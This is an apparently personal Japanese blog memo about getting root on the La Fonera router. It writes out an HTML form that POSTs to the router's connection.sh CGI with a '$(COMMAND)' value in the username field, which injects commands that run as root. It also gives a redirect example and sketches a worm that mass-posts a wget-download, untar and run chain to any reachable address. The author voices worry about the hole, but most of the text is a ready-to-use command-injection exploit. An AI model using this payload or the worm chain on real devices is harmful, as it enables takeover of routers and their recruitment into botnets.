postで出来ること

ssh可能にするプロセスで気になったことを突き詰めてみる.
管理用なのかたまたまなのかは不明だが, La Foneraはhttpのpostメソッドを使えばroot権限で任意のコマンドを実行可能な模様.
下手したら脆弱性じゃないかと思いつつもどこまでできるかやってみた.

やりかた

wikiからhtmlタグ転載

 < form method="post" action="http://169.254.255.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data" >
 <input name="username" value="$(COMMAND)" size="68" >
 <input type="submit" name="submit" value="Submit" >
< /form>

このhtmlのテキストエリアに "$(" と ")"ではさんで任意のコマンドをpostしてやれば実行可能.
返り値が得られないので適当にリダイレクトしましょう.

ex)
$(id > /namae)

この例だと /直下に namae ってファイルが作られてその中に rootで

# id

を実行したときと同じ結果が得られる.

んで試してみたけど、echo, sed, awk が入ってる上にファイルの出入力も出来たから,実質大概の事は出来る気がした.
WANポートにグローバルIPアドレスが降られているFoNルータとかはそのうち攻撃対象になりそうな予感.
cpuがi386じゃないのと組込みlinuxで作法が違うからscript kidyとかなら大丈夫だろうけど,この脆弱性使ってFonneraに特化したワームとか作ったら結構危ないんじゃないかと勝手に想像.

{IPADDR}/cgi-bin/webif/connection.sh に対して無差別に
$(wget http://url/bot.tar)
$(tar xf bot.tar)
$(bot実行のコマンド)
とかpostするプログラムとかやばげだな...

俺向けメモ
todo